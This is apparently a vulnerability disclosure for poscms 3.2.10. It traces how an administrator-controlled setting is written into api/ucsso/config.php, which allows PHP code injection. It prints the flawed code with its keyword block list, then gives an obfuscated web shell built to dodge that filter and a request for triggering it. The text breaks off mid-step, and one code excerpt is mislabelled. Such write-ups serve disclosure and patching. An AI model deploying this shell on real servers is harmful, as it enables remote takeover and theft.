poscms 3.2.10
you should be a Administrator
the file of diy\module\member\controllers\admin\Setting.php,in the function of 'index'
1. public function index() {
2.
3. $page = (int)$this->input->get('page');
4. $result = 0;
5.
6. if (IS_POST) {
7. $post = $this->input->post('data');
8. $page = (int)$this->input->post('page');
9. // 规则判断
10. if (emptyempty($post['regfield'])) {
11. $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
12. } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
13. $this->admin_msg('开启邮件审核后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
14. } elseif (!in_array('email', $post['regfield']) && $post['ucenter'] == 1) {
15. $this->admin_msg('开启Ucenter后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
16. } elseif (!in_array('phone', $post['regfield']) && $post['regverify'] == 3) {
17. $this->admin_msg('开启手机验证码审核后,注册字段必须选择【手机】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
18. } elseif ($post['ucsso'] && $post['ucenter']) {
19. $this->admin_msg('Ucenter和UCSSO不能同时开启', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
20. }
21. $this->member_model->member($post);
22. $data = $post; //用户的输入
23. $cache = $this->member_model->cache(); //进入对应的cache()函数
24. $result = 1;
in the twenty-third line member_model->cache();
so we go to the file of diy\module\member\models\Member_model.php
,and in the funtion of cache
,we can see:
1. $page = (int)$this->input->get('page');
2. $result = 0;
3.
4. if (IS_POST) {
5. $post = $this->input->post('data');
6. $page = (int)$this->input->post('page');
7. // 规则判断
8. if (empty($post['regfield'])) {
9. $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);//这里需要注意
10. } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
11. 。。。。。。。。。。。。。。。。。。。。。。略过
12. // 更新UCSSO配置
13. if ($cache['setting']['ucsso']) {
14. $ucsso = htmlspecialchars_decode($cache['setting']['ucssocfg']); //vul
15. if (strpos($ucsso, 'eval') !== false
16. || strpos($ucsso, '_POST') !== false
17. || strpos($ucsso, '_REQUEST') !== false
18. || strpos($ucsso, '_GET') !== false) {
19. return;
20. }
21. file_put_contents(WEBPATH.'api/ucsso/config.php', $ucsso , LOCK_EX); //vul
22. }
23.
24. $this->ci->clear_cache('member');
25. $this->dcache->set('member', $cache);
26.
27. return $cache;
28. }
because user can control the value of $cache['setting'
]['ucssocfg'] ,then in the twenty-first lines we can write evail code into the file of api/ucsso/config.php
Allows attackers to getshell
一.
the code of shell can be
<?php
error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
the post it the file of api\ucsso\config.php
will become it.then you can getshell by requesting http://127.0.0.1:8888/index.php?c=myndtt&m=index
note : if you can't success,may the package that you post not include the 'regfield' you should add it
like this: